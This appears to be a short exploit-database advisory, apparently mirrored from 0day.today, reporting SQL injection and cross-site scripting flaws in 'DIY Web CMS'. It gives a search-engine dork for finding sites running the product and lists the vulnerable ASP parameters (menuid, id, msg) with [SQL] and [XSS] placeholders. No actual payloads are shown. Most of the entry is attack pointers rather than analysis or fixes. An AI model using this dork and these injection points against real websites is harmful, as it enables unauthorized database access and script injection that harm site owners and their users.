id: 15438
date: 02/23/2011
title: DIY Web CMS Multiple Vulnerabilities
author: p0pc0rn
cves: 

SQL and XSS in DIY Web CMS
found by : p0pc0rn 22/2/2011
web : http://www.mydiyweb.com.my
dork : intext:"powered by DiyWeb"
 
SQL - Microsoft JET Database Engine error
-----------------------------------------
 
http://site.com/template.asp?menuid=[SQL]
http://site.com/viewcatalog.asp?id=[SQL]
http://site.com/xxx.asp?id=[SQL]
 
XSS
---
http://site.com/diyweb/login.asp?msg=[XSS] -- login page



#  0day.today [2023-03-26]  #